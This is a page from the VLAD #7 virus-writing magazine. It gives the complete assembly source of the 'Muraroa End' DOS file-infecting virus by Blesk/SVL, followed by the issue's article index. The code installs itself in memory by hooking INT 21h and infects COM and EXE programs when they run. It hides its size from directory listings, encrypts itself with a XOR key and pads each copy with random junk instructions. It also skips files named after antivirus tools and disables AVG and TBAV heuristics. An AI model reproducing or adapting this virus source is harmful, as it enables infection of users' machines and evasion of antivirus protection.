Virus Labs & Distribution
VLAD #7 - Muraroa End


.286
	;********************************************************
        ;* This source was created by Blesk/SVL in 23.03.1996   *
	;********************************************************
        ;*              (C)  Blesk/SVL 1996/97                  *
        ;********************************************************

codes segment
             assume   cs:codes, ds:codes, ss:codes
        org   100h
startprog:

	virlength     		equ   end_vir-begin
        mem_to_res              equ   140h

	jmp	  svir                ; Jump to VIRUS
	nop
	nop
	nop
	mov	  ah,4ch
	int	  21h

_virus:
begin:

;============== UTIL TO restore infected program in memory ==================
beg_c:
          call     avg_fuck
          pop      es
          push     es
          mov      ax,es
          add      ax,10h

          add      [cs:((offset eps) - begin)+si],ax
          add      [cs:((offset ess) - begin)+si],ax
          cmp      byte ptr [cs:((offset com_exe) - begin)+si],'c'
          jnz      _exe_type
          mov      ax,[cs:((offset orig_instr)-begin)+si]
          mov      [cs:100h],ax
          mov      ax,[cs:((offset orig_instr)-begin+2)+si]
          mov      [cs:102h],ax
          mov      [cs:((offset eps)-begin)+si],cs
          mov      [cs:((offset epo)-begin)+si],100h
          mov      [cs:((offset ess)-begin)+si],cs
_exe_type:
          pop      es
          push     es

          push     cs
          pop      ds

;================ UTIL TO try if is virus now in memory =====================

        mov        ax,1996h
        int        21h
        cmp        ax,9619h
        jz         _instaled

;======================= UTIL TO get addr INT21h ============================

        push     bx
        push     es
        mov      ax,3521h
        int      21h
        mov      word ptr [cs: (or_21-begin)+si],bx
        mov      word ptr [cs: (or_21-begin)+2+si],es
        mov      word ptr [cs: (org_21-begin)+si],bx
        mov      word ptr [cs: (org_21-begin)+2+si],es
        pop      es
        pop      bx
;===================== UTIL TO GET MEM FOR VIRUS ============================

        pop        es
        push       es

        push       ds
        mov        ax,es
        dec        ax
        dec        ax
        mov        es,ax
        cmp        byte ptr [es:10h],5ah
        jz         no_end1
_end2:  jmp        _end1
no_end1:
        mov        ax,[es:13h]
        sub        ax,mem_to_res
        jc         _end2
        mov        [es:13h],ax
        sub        word ptr [es:22h],mem_to_res
        mov        es,[es:22h]
        pop        ds
;===================== UTIL TO move virus in MEMORY =========================

        xor        di,di
        cld
        push       si
        mov        cx,virlength
        repz       movsb
        pop        si

;======================= UTIL TO INITIALEZE VIRUS ===========================

        mov        ax,2521h
        push       es
        pop        ds
        mov        dx,(_int21-begin)
        int        21h

;=========== Pop and go to original ============

_instaled:
_end1:
             pop      es
_p11:        pop      bp
_p21:        pop      ds
_p31:        pop      es
_p41:        pop      dx
_p51:        pop      cx
_p61:        pop      bx
_p71:        pop      ax
             pop      si

             mov        ss,[cs:((offset ess)-begin)+si]
             push       [cs:((offset eps)-begin)+si]
             push       [cs:((offset epo)-begin)+si]
             retf

;############################################################################

;==================== Code to CALL and JMP to orig 21H ======================

dos:
             pushf
             db       9ah    ; CALL xxxx:xxxx
or_21:	     dd       0
             ret
To_21:
             db       0eah   ; JMP  xxxx:xxxx
Org_21:
             dw       0,0

;=============Cange DTA====================================
change_dta:  pushf
             push       ax
             push       bx
             push       cx
             push       dx
             push       es
             mov        ah,2fh
             call       dos
             mov        dx,[es: word ptr bx+18h]
             and        dh,0c0h
             cmp        dh,0c0h
             jnz        not_inf_dta;
             mov        dx,[es: word ptr bx+18h]
             and        dh,3fh
             mov        [es: word ptr bx+18h],dx
             sub        word ptr [es: word ptr bx+1ah],virlength
             sbb        word ptr [es: word ptr bx+1ch],0
not_inf_dta: pop        es
             pop        dx
             pop        cx
             pop        bx
             pop        ax
             popf
             ret
;=======find first via handle=============
ffvh:        popf
             call       dos
             jc         ffvh2
             call       change_dta
ffvh2:       retf       2

;======find first/next via fcb=============================
ffvfcb:      popf
             call       dos
             pushf
             cmp        al,00
             jnz        no_found
             push       ax
             push       bx
             push       cx
             push       dx
             push       es
             mov        ah,2fh
             call       dos
             mov        al,[es: word ptr bx]
             cmp        al,0ffh
             jnz        @ew
             add        bx,8
@ew:
             mov        dx,[es: word ptr bx+18h]
             and        dh,0c0h
             cmp        dh,0c0h
             jnz        not_inf_dta2;
             mov        dx,[es: word ptr bx+18h]
             and        dh,3fh
             mov        [es: word ptr bx+18h],dx
             sub        word ptr [es: word ptr bx+1ch],virlength
             sbb        word ptr [es: word ptr bx+1eh],0
not_inf_dta2:
             pop        es
             pop        dx
             pop        cx
             pop        bx
             pop        ax

no_found:    popf
             iret
;==========================================================
Stupid_Tex_For_Now_:       ; May be not 8))) 
             db    ' I am in LOVE now... ZUZANKA B.B. in Slovakia <:)<8< '
;############################################################################
;              !!!!!!!!!!!!! here is my int 21h !!!!!!!!!!!!!
;############################################################################
ffvh3:       jmp        ffvh
ffvfcb1:     jmp        ffvfcb
_int21:
             pushf
             cmp        ax,1996h
             jnz        _next
             xchg       ah,al
             popf
             sti
             iret
_next:
             cmp        ax,4b00h
             jnz        _infe
             jmp        _infect
_infe:
             cmp        ah,4eh
             jz         ffvh3

             cmp        ah,4fh
             jz         ffvh3

             cmp        ah,12h
             jz         ffvfcb1

             cmp        ah,11h
             jz         ffvfcb1


;========================================================
_jmp_dos:
             popf
             jmp        To_21
;========================================================
;############################################################################
include files.inc
;############################################################################
;############################################################################
;============= Util to add virus to open file =====================
add_to_file:
	     call           end_file
	     push           bp
             push           es
             push           ds
             push           di
             push           si

             push           cs
             pop            es
             push           cs
             pop            ds

             mov            cx,[cs: word ptr (num_reloc-begin)]
             mov            bx,(table_reloc-begin)

R_continue:
             push           cx
             push           bx

             mov            di,[cs: word ptr bx]
             mov            dl,[cs: byte ptr bx+2]
             xor            dh,dh
zt4:         call           DEADCODE
             add            di,2
             dec            dx
             jnz            zt4

             pop            bx
             add            bx,3  ;<= go to next position in TABLE
             pop            cx
             dec            cx
             jnz            R_continue



rtyt:
             call           rnd_byte
             cmp            al,0
             jz             rtyt
             mov            [cs:byte ptr (_value-begin)],al

             mov            di,(buff-begin)         ; Move
             xor            si,si

             xor            dx,dx
             mov            ax,(end_c-begin)       ; Crypt
             mov            bx,40h
             div            bx
             mov            cx,ax                  ; Count how much blocks
ccykl:
             mov            bx,40h
             mov            di,(buff-begin)
cccykl:      mov            al,[si]                ; Crypt 1 40h block
             xor            al,[cs:byte ptr (_value-begin)]
             mov            [di],al                ;
             inc            si
             inc            di
             dec            bx
             jnz            cccykl                 ; Loop to Crypt routine
             push           cx
             push           dx
             push           si
             push           di
             call           end_file
             mov            dx,(buff-begin)        ; And Save that BLOCK
             mov            cx,40h
             call           write_file
             call           end_file
             pop            di
             pop            si
             pop            dx
             pop            cx
             dec            cx
             jnz            ccykl                  ; Last COMPLET 40h block

                                                   ; yes => Crypt last few
             cmp            dx,0
             jz             _no_last_few
             push           dx
                                                   ; bytes (les than 40h)
             mov            di,(buff-begin)
cykl:        mov            al,[si]                ; Crypt block
             xor            al,[cs:byte ptr (_value-begin)]
             mov            [di],al                ;
             inc            si
             inc            di
             dec            dx
             jnz            cykl                   ; Loop to Crypt routine
             call           end_file
             mov            dx,(buff-begin)        ; And Save last uncomplet
             pop            cx                     ; BLOCK
             call           write_file
             call           end_file
_no_last_few:
             mov            cx,(buff-end_c)     ; Copy decryptor
             push           cs                     ; to buff
             push           cs                     ;
             pop            ds                     ;
             pop            es                     ;
             mov            di,(buff-begin)        ;
             cld                                   ;
             repz           movsb                  ;

             call           end_file
             mov            cx,(buff-end_c)        ;
             mov            dx,(buff-begin)        ; AND save it !!!!
             call           write_file             ;
             call           end_file
             pop            si
             pop            di
             pop            ds
             pop            es
             pop            bp
             ret
;=====================================================================
;############################################################################
;############################################################################
;############################################################################
;================ Util to mark infected file via date ================
Mark_file:
             mov        ax,5700h
             mov        bx,[cs:( handle - begin )]
             call       dos
             or         dh,0c0h
             mov        ax,5701h
             call       dos
             ret
;=====================================================================
;############################################################################
;############################################################################
;############################################################################
;===================== Data used by VIRUS ============================
EXE_HEADER:  db         'MZ'                     ;header of exe file
lastpage:    dw         ?                        ;Bytes in last page
nopages:     dw         ?                        ;Count of pages
RELOC:       dw         ?                        ;Count of relocate items
HederSize:   dw         ?                        ;Heder size
MinMem:      dw         ?
MaxMem:      dw         ?
ReloSS:      dw         ?                        ;Initial SS
ReloSP:      dw         ?                        ;Initial SP
CeckSum:     dw         ?                        ;DOS 3.00+ not use it !!!!
StartIP:     dw         ?                        ;Starting IP
StartCS:     dw         ?                        ;Starting CS
OfsRelo:     dw         ?                        ;Relocation table's offset
OVRType:     dw         ?                        ;0=Main segment
nope  :      dw         ?
pklite:      dw         ?                        ;PKLITE = PK sign .. Don't
                                                 ;INFECT !!!!!
;############################################################################
Old_21     : dd ?
Time       : dw ?
date       : dw ?
Handle     : dw ?
virussize    equ        (offset end_vir)-(offset _virus)
com_exe  : dw 'c'
;############################################################################
_vypis:      push       ax
             push       dx
             push       cx
             push       ds

             push       cs
             pop        ds

             mov        ah,04
             int        1ah
             cmp        dh,05h                    ; Month = 5 ???
             jnz        not_vypis
             cmp        dl,04h                    ; Day = 4 ???
             jz         y_vypis
             cmp        dl,08h                    ; Day = 8 ???
             jz         y_vypis
             cmp        dl,14h                    ; Day = 14 ???
             jz         y_vypis
             jmp        not_vypis
y_vypis:
             call       beep

             mov        dx,(text1-begin)
             mov        ah,09h
             call       dos
             call       line                  ; 49 x 
             mov        dx,(text2-begin)
             mov        ah,09h
             call       dos
             call       line                  ; 49 x 
             mov        dx,(text3-begin)
             mov        ah,09h
             call       dos
             call       line                  ; 49 x 
             mov        dx,(text4-begin)
             mov        ah,09h
             call       dos
             call       line                  ; 49 x 
             mov        dx,(text5-begin)
             mov        ah,09h
             call       dos

             mov        ah,08
             call       dos
             call       beep

not_vypis:
             pop        ds
             pop        cx
             pop        dx
             pop        ax

             ret
;==========================================================
line:
             mov        cx,49
lllll:       mov        dl,''
             mov        ah,06h
             call       dos
             loop       lllll
             ret
;==========================================================
beep :
       push ax
       mov ax,0e07h
       int 10h
       pop ax
       ret
;==========================================================
; 0cdh - line
text1:       db         13,10
             db         0c9h,'$'
text2:
             db         0bbh,13,10
             db         0bah,'   I have one mesage to all people on earth :    ',0bah
             db         13,10
             db         0cch,'$'
text3:       db         0b9h,13,10
             db         0bah,' All French nuc. test`s was STOPED. But MURUROA  ',0bah
             db         13,10
             db         0bah,'  IS DEAD !!!!! I am a coder of HELL FIRE and I  ',0bah
             db         13,10
             db         0bah,'   BRING  YOU  >>>>>> FIRE <<<<<< By Blesk/SVL   ',0bah
             db         13,10
             db         0bah,'NOTE:    Name of this virus is [MURUROA_END]     ',0bah
             db         13,10
             db         0bah,' By Blesk from Slovak Virus Laboratories at .SK  ',0bah
             db         13,10
             db         0bah,' Real name of BOZA is BIZATCH.. STUPID A-VERS !!!',0bah
             db         13,10
             db         0bah,'    PLUTONIUM IS BETTER IN POWER-PLANT !!!!      ',0bah
             db         13,10
             db         0bah,' My greet to: VYVOJAR,SVL,VLAD,SKIMS,40-hex,IR   ',0bah
             db         13,10
             db         0cch,'$'
text4:
             db         0b9h,13,10
             db         0bah,' And to some my friends:    DJ.Milan,DJ.Maros,   ',0bah
             db         13,10
             db         0bah,' DJ.Babula(Baby),TINA-huhu,DURO,LACI,Duffy,Kaaa, ',0bah
             db         13,10
             db         0bah,' Stano ...and more... A zdravim Mira Trnku  8))  ',0bah
             db         13,10
             db         0c8h,'$'
text5:
             db         0bch,13,10
             db         13,10,'$'

;############################################################################
;=====================================================================
;############################################################################
;############################################################################
;############################################################################
;============== Utils to infect files !!!! ===========================
_infect:
             push       ax
             push       bx
             push       cx
             push       es
             push       dx
             push       ds
             call       _vypis
             call       infect_files
             pop        ds
             pop        dx
             pop        es
             pop        cx
             pop        bx
             pop        ax
             jmp        _jmp_dos
;=====================================================================
; ======================= INT_24.INC By Blesk/SVL ========================

int24:          dw      0,0

;============ Hook int 24h and store original vector =====================
Hook_24:
                push    es
                push    ax
         ; ==================================================
                xor     ax,ax
                mov     es,ax
                mov     ax,[es: word ptr (24h*4)]
                mov     [cs: word ptr (int24-begin)],ax
                mov     ax,[es: word ptr (24h*4+2)]
                mov     [cs: word ptr (int24-begin+2)],ax
         ; ======== Check INT 24 vector =====================
                mov     ax,(INT_24-begin)
                mov     [es: word ptr (24h*4)],ax
                push    cs
                pop     ax
                mov     [es: word ptr (24h*4+2)],ax
         ; ======== Set new INT 24 vector ===================
                pop     ax
                pop     es
                ret

;============ UnHook int 24h and restore original vector =================
UnHook_24:
                push    es
                push    ax
         ; ==================================================
                xor     ax,ax
                mov     es,ax
                mov     ax,[cs: word ptr (int24-begin)]
                mov     [es: word ptr (24h*4)],ax
                mov     ax,[cs: word ptr (int24-begin+2)]
                mov     [es: word ptr (24h*4+2)],ax
         ; ======== Restore INT 24 vector =====================
                pop     ax
                pop     es
                ret
;==============================MY int 24h=================================
INT_24:
                mov     al,03
                iret
;=========================================================================
infect_files:
             call       Hook_24
             call       findstr
             cmp        byte ptr [cs:((offset nasiel_s)-begin)],0ffh
             jz         can_infect
             jmp        NoInfecting
can_infect:
             call       open_file

             mov        cx,4h
             mov        dx,((offset exe_header)-begin)
             call       read_file

             cmp        word ptr [cs:((offset exe_header)-begin)],5a4dh
             jnz        com_infect
             call       exe_infect
             jmp        clo_infect
com_infect:  call       infect_com
clo_infect:  call       close_file
NoInfecting:
             call       UnHook_24
             ret
;=====================================================================
infect_com:
             call       begin_file
             jnc         cic2
             jmp         cic
cic2:
             mov        cx,4h
             mov        dx,((offset exe_header)-begin)
             call       read_file
             jc         cic
             push       cs
             pop        ds
             mov        ax,[ds:((offset exe_header)-begin)]
             mov        [ds:((offset orig_instr)-begin)],ax
             mov        ax,[ds:((offset exe_header)-begin+2)]
             mov        [ds:((offset orig_instr)-begin+2)],ax
             call       end_file
             add        ax,virlength
             jc         cant_infect_com
             sub        ax,virlength

             mov        bx,[cs:((offset handle)-begin)]
             mov        cx,0ffffh
             mov        dx,0fffeh
             mov        ax,4202h
             call       dos

             mov        dx,((offset exe_header)-begin)
             mov        cx,2
             call       read_file

             cmp        word ptr [cs: ((offset exe_header)-begin)],1111h
             jz         cant_infect_com
             call       end_file
             push       ax
             call       begin_file
             pop        ax

             sub        ax,3
             add        ax,(svir-begin)
             mov        [cs:((offset exe_header)-begin+1)],ax
             mov        al,0E9h
             mov        [cs:((offset exe_header)-begin)],al
             mov        cx,3h
             mov        dx,(offset exe_header)-begin
             mov        byte ptr [cs:((offset com_exe)-begin)],'c'


             call       write_file

             jc         cic
             call       end_file
             jc         cic
             add        ax,100h
             mov        [cs: word ptr (delta-begin)],ax
             sub        ax,100h
             call       add_to_file
             call       mark_file

cic:
cant_infect_com:

          ret
;==========================================================
exe_infect:
             mov        cx,0ffffh
             mov        dx,0fffeh
             mov        ax,4202h
             call       dos

             mov        cx,2
             mov        dx,(offset buff)-begin
             call       read_file
             cmp        word ptr [cs:((offset buff)-begin)],1111h
             jz         cic

             call       begin_file

             mov        cx,20h
             mov        dx,(offset exe_header)-begin
             call       read_file

             cmp        word ptr [cs:((offset ovrtype)-begin)],0000
             jnz        cic
             cmp        word ptr [cs:((offset pklite)-begin)],'PK'
             jz         cic

             mov        bx,[cs:((offset reloSS)-begin)]
             mov        [cs:((offset ess)-begin)],bx
             mov        bx,[cs:((offset startIP)-begin)]
             mov        [cs:((offset epo)-begin)],bx
             mov        bx,[cs:((offset startCS)-begin)]
             mov        [cs:((offset eps)-begin)],bx


             add        word ptr [cs:((offset reloSS)-begin)],10h
             add        word ptr [cs:((offset minmem)-begin)],100h
             add        word ptr [cs:((offset maxmem)-begin)],100h
             jnc        NoCaryMem
             mov        word ptr [cs:((offset maxmem)-begin)],0ffffh
NoCaryMem:
             mov        byte ptr [cs:((offset com_exe)-begin)],'E'

             mov        ax,virussize
             mov        bx,200h
             xor        dx,dx
             div        bx
             add        word ptr [cs:((offset nopages)-begin)],ax
             add        dx,word ptr [cs:((offset lastpage)-begin)]
             xchg       ax,dx
             xor        dx,dx
             div        bx
             mov        word ptr [cs:((offset lastpage)-begin)],dx
             add        word ptr [cs:((offset nopages)-begin)],ax
             call       end_file
             push       si
             push       di

             mov        di,dx
             mov        si,ax

             mov        ax,[cs:((offset hedersize)-begin)]
             mov        bx,10h
             mul        bx

             sub        si,ax
             sbb        di,dx
             mov        dx,di
             mov        ax,si
             pop        di
             pop        si
             mov        bx,10h
             div        bx
             mov        [cs:  word ptr (delta-begin)],dx
             add        dx,(svir-begin)  ; START at Svir
             mov        [cs:((offset startIP)-begin)],dx
             mov        [cs:((offset startCS)-begin)],ax

             call       begin_file
             mov        cx,1ch
             mov        dx,((offset EXE_header)-begin)
             call       write_file
             call       end_file
             call       add_to_file
             call       Mark_file

@44:         ret


;==========================================================



;############################################################################
;############################################################################
My_Favourite_paper_magazine:   db ' I love PC Revue .... '

;################################################################
;################################################################
;###    Here is located RELOC table to put dumb instruction   ###
;################################################################
;################################################################

num_reloc:
  dw    38
table_reloc:
  dw  dumb1-begin
  db  5
  dw  dumb2-begin
  db  23
  dw  dumb3-begin
  db  9
  dw  dumb4-begin
  db  3
  dw  dumb5-begin
  db  6
  dw  dumb6-begin
  db  16
  dw  dumb7-begin
  db  7
  dw  dumb8-begin
  db  3
  dw  dumb9-begin
  db  3
  dw  dumb10-begin
  db  9
  dw  dumb11-begin
  db  1
  dw  dumb12-begin
  db  3
  dw  dumb13-begin
  db  32
  dw  dumb14-begin
  db  4
  dw  dumb15-begin
  db  5
  dw  dumb16-begin
  db  5
  dw  dumb17-begin
  db  15
  dw  dumb18-begin
  db  8
  dw  dumb19-begin
  db  3
  dw  dumb20-begin
  db  4
  dw  dumb21-begin
  db  8
  dw  dumb22-begin
  db  6
  dw  dumb23-begin
  db  1
  dw  dumb24-begin
  db  1
  dw  dumb25-begin
  db  2
  dw  dumb26-begin
  db  13
  dw  dumb27-begin
  db  3
  dw  dumb28-begin
  db  3
  dw  dumb29-begin
  db  3
  dw  dumb30-begin
  db  3
  dw  dumb31-begin
  db  3
  dw  dumb32-begin
  db  3
  dw  dumb33-begin
  db  3
  dw  dumb34-begin
  db  3
  dw  dumb35-begin
  db  3
  dw  dumb36-begin
  db  3
  dw  dumb37-begin
  db  3
  dw  dumb38-begin
  db  3

;################################################################
;======================== FIND.INC Thanx to SVL ==========================


analiza:
     ;      ds:dx  =>'c:\path\name.ext',0
      push  ax
      push  si
      push  dx
      push  dx  ;   ds:dx = ds:si
      pop   si
analiza2:
      cmp   byte ptr [si],'\'
      jz    lomitko
      cmp   byte ptr [si],0
      jz    end_name
      inc   si
      jmp   analiza2
lomitko:
      pop   ax
      inc   si
      push  si
      jmp   analiza2
end_name:
      pop   dx
      pop   si
      pop   ax
     ;      ds:dx  =>'name.ext',0
      ret

;-----------------------------------------------------------------------------
;Procedre FINDSTR check if string at adress DS:DX contain some1 word from
;table.
; Input:  DS:DX-> string
; Output: NASIEL_S =0 Contain  Nasiel_s = FFh Not contain

FINDSTR1 proc near
         pusha
         jmp findstr2

FINDSTR :
         pusha
         mov  byte ptr [cs:((offset nasiel_s)-begin)],0ffh
         call analiza
         push dx
         pop  si
         mov di,(offset tab-begin)
findstr2:mov bp,si
 compar0:mov cx,0
 compar1:xor bx,bx
 compar2:mov ah,byte ptr cs:[di+bx] ;AH= char from table
         cmp ah,0                   ; New word ????
         jnz  nextwor
         cmp cx,0
         jnz found
         jz  nextword
nextwor:
         cmp ah,1
         jz found_1
         mov al,byte ptr ds:[si+bx] ;AL= char from checked string

 ; UpChar

         cmp al,5bh             ;Make upcase of chars
         jns compar3
         cmp al,41h
         js compar3
         or al,20h

 compar3:
        cmp al,0
        jnz next_w              ;end of name ??? (try next)
        cmp cx,0
        jnz found
        jnz nextword
 next_w:
        inc bx
        inc dx
        inc cx
        cmp al,ah
        jz  compar2

 nextword:mov ah,cs:[di]
        inc di
        cmp ah,1                 ;If it is last word then mark NOT contain
        jz found_1
        cmp ah,0                 ;begin of new word ????
        jnz nextword
        jmp compar0              ;Yes check it !!!!!
  found:
        mov byte ptr [cs:((offset nasiel_s)-begin)],0h
found_1:popa
        ret

FINDSTR1 endp
nasiel_s:db 0
Exe db ".exe",0
Com db ".com",1
Tab db "avg",0
    db "fv386",0
    db "turbo",0
    db "fv86",0
    db "td",0
    db "stacker",0
    db "toolkit",0
    db "msav",0
    db "vc",0
    db "rex",0
    db "virlab",0
    db "vir",0
    db "alik",0
    db "guard",0
    db "nod",0
    db "tbav",0
    db "tbdriver",0
    db "clean",0
    db "f-pro",0
    db "avast",0
    db "asta",0
    db "tbscan",0
    db "debug",0
    db "cpav",0
    db "tlink",0
    db "vlad",0
    db "nav",0
    db "vshie",0
    db "dizz",0
    db "command",0
    db "hiew",0
    db "sswap",0
    db "scan",0
    db "tbclean",0
    db "vsafe",1
SpecForMT:     db ' For M.T.: Vivat Ziar nad Hronom.. 8)) Uz si rad ?? '
               db ' RADAR v PC Revue 9/94 '

; Who is M.T. ??? It is Slovak A-Ver 8) and this was my MSG
; FOR him
;******************************************************************************
; This procedure generates GARBAGE ( instructions which have no other purpose
; than to increase the variance of the code)
; G_TABLE.INC ==> table of destation adress and counts

last:      db     0

DEADCODE proc near
	   push   ds
	   pusha
           push   di
           push   si
           push   dx
           push   dx
           pop    si
  again:
	   call   RND_BYTE
	   and    al,00011111b

           cmp    al,14        ; check range <0,13>
           jnc    again        ; Index in table2
           cmp    al,[cs: byte ptr (last-begin)]
           jz     again
           mov    [cs:byte ptr (last-begin)],al

           mov    bx,table2-begin
           mov    ah,0
           add    ax,ax
           push   ax
           pop    si
           add    si,bx
           mov    bx,[cs: word ptr si]
           mov    [cs: word ptr di],bx


  D_CODE_END:
           pop    bp
           pop    si
           pop    di
	   popa
	   pop    ds
	   ret
;-----------------------------------------------------------
 RND_BYTE proc near
           in al,40h
	   ret
 rnd_byte endp


table2 :
          db   088h,0ffh,089h,0c9h,088h,0c9h,021h,0d2h
          db   089h,0c0h,088h,0c0h,088h,0e4h,089h,0dbh,088h,0dbh
          db   088h,0edh,089h,0d2h,088h,0d2h,088h,0f6h,02ch,000h

DEADCODE endp
end_c:
;================================================================

;################################################################
;########Kill Heuristick in AVG (sometimes and in TBAV)##########

old_20:  dw 0,0

my_20:
	iret

avg_fuck:
dumb27: dw       3 dup(9090h)
        mov	ax,3520h
        int	21h
dumb28: dw       3 dup(9090h)
        mov	word ptr [cs : (old_20 - begin)+si],bx
dumb29: dw       3 dup(9090h)
        mov	word ptr [cs : (old_20 - begin+2)+si],es
dumb30: dw       3 dup(9090h)

        push     cs
        pop     ds
dumb31: dw      3 dup(9090h)
        mov     dx,my_20-begin
        add     dx,si
dumb32: dw      3 dup(9090h)
        mov     ax,2510h
dumb33: dw      3 dup(9090h)
        add     ax,10h
        int     21h
dumb34: dw      3 dup(9090h)

        int     20h

        mov	dx, word ptr [cs: (old_20-begin)+si]
dumb35: dw      3 dup(9090h)
        mov	ds, word ptr [cs: (old_20-begin+2)+si]
dumb36: dw      3 dup(9090h)
        mov	ax,2520h
dumb37: dw      3 dup(9090h)
        int	21h
dumb38: dw      3 dup(9090h)

        ret
;############################################################################
;############################################################################
;==========================================================================;
             nop
_protector:  jmp        _protect1
             nop
int_8:       dw         0,0
_value:      db         0
dec_8:
              ;================(destruct instrucition at JAMP:)=========
             mov        ax,9090h
             mov        word ptr [cs : ((offset jjjj)-begin) + si],ax

decod1:      db         0b9h
             dw         end_c-beg_c
             push       si
             mov        dl,byte ptr [cs: (offset(_value)-offset(begin)) + si]
             cmp        dl,0
             jz         decod7
decod4:
             xor        [cs: byte ptr si+(beg_c-begin)],dl
             inc        si
decod6:      db         49h
             jnz        decod4
decod7:
             pop        si

             mov        al,20h
             out        20h,al

             iret


;==========================================================================

_protect1:
             sti
dumb2:       dw         23 dup(9090h)
             mov        ax,2h
             push       ax
dumb3:       dw         9 dup(9090h)
             pop        es
             mov        bx,word ptr [es: 0]
dumb4:       dw         3 dup(9090h)
             mov        ax,word ptr [es: 2]
dumb5:       dw         6 dup(9090h)
             mov        [cs:((offset int_8)-begin)+si],bx
dumb6:       dw         16 dup(9090h)
             mov        [cs:((offset int_8)-begin+2)+si],ax

             push       cs
dumb7:       dw         7 dup(9090h)
             pop        ds
             mov        dx,((offset dec_8)-begin)
             add        dx,si
dumb8:       dw         3 dup(9090h)
             mov        ax,word ptr [cs : ((offset jjjj)-begin) + si]
dumb9:       dw         3 dup(9090h)
             mov        word ptr [cs : ((offset backup)-begin) + si],ax
             cli
dumb10:      dw         9 dup(9090h)
             mov        word ptr [es: 0],dx
dumb11:      dw         1 dup(9090h)
             mov        word ptr [es: 2],ds
dumb12:      dw         3 dup(9090h)
             sti
jamp:
dumb13:      dw         32 dup(9090h)

jjjj:        jmp        jamp
             cli
             mov        dx,[cs:((offset int_8)-begin)+si]
dumb14:      dw         4 dup(9090h)
             mov        ax,[cs:((offset int_8)-begin+2)+si]
dumb15:      dw         5 dup(9090h)
             mov        word ptr [es: 0],dx
dumb16:      dw         5 dup(9090h)
             mov        word ptr [es: 2],ax
             sti
dumb17:      dw         15 dup(9090h)
             mov        ax,word ptr [cs : ((offset backup)-begin) + si]
dumb18:      dw         8 dup(9090h)
             call       dumb26
             mov        word ptr [cs : ((offset jjjj)-begin) + si],ax
             ret
backup:      dw         9090h

;############################################################################
;############################################################################
;############################################################################
;############################################################################
;############################################################################
;############################################################################

svir:

          db       0beh                    ;Stands for MOV SI,xxxx
delta     dw       offset begin            ;We'll put the data offset in.

          push     si
dumb1:    dw       5 dup(9090h)
_p10:     push     ax
          call     dumb26
          pop      ax
          call     dumb25
          push     ax
dumb19:   dw       3 dup(9090h)
          call     dumb25
_p20:     push     bx
dumb20:   dw       4 dup(9090h)
          call     dumb25
_p30:     push     cx
dumb21:   dw       8 dup(9090h)
          call     dumb26
_p40:     push     dx
dumb22:   dw       6 dup(9090h)
          call     dumb26
_p50:     push     es
dumb23:   dw       1 dup(9090h)
          call     dumb25
_p60:     push     ds
          call     dumb26
dumb24:   dw       1 dup(9090h)
          call     dumb26
_p70:     push     bp
          call     dumb26
          push     es

          push     si
          pusha
          call     avg_fuck
          popa
          pop      si

          call     _protector
jmp       beg_c
dumb26:   dw       13 dup(9090h)
          ret
dumb25:   dw       2 dup(9090h)
          jmp      dumb26

dddddd:   jmp      dumb25
epo        : dw ?
eps        : dw ?
ess        : dw ?
orig_instr : db 90h,90h,90h,90h
sign:
             dw         1111h
end_vir:
buff:
codes   ends
end     startprog
;#########################################################################
;##                    This source was generated by                     ##
;##                Blesk's Funky Generator by Blesk/SVL                 ##
;#########################################################################
;##                I used FOG - Funky Op code Generator                 ##
;##                           THANX ......                              ##
;#########################################################################
- VLAD #7 INDEX -

ARTICLE.1_1      

Introduction
ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag

ARTICLE.2_1      

No Flags
ARTICLE.2_2       Goodbye Virus
ARTICLE.2_3       Boot Sector Tutorial
ARTICLE.2_4       STAOG Linux Virus
ARTICLE.2_5       Pow Boot Virus
ARTICLE.2_6       Wulf2
ARTICLE.2_7       Tbscan Internals

ARTICLE.3_1      

VLAD Viruses
ARTICLE.3_2       TVIR600
ARTICLE.3_3       Vecna Boot Virus
ARTICLE.3_4       Padania Virus
ARTICLE.3_5       HooDoo Virus
ARTICLE.3_6       Pandemonium Virus
ARTICLE.3_7       Black Lotus

ARTICLE.4_1      

Zip Virus
ARTICLE.4_2       Archive Infect
ARTICLE.4_3       Virstop Article
ARTICLE.4_4       Boza Makes Bontchev Barf Virus
ARTICLE.4_5       Killer Virus
ARTICLE.4_6       Muraroa End
ARTICLE.4_7       Mages Fury

About VLAD - Links - Contact Us - Main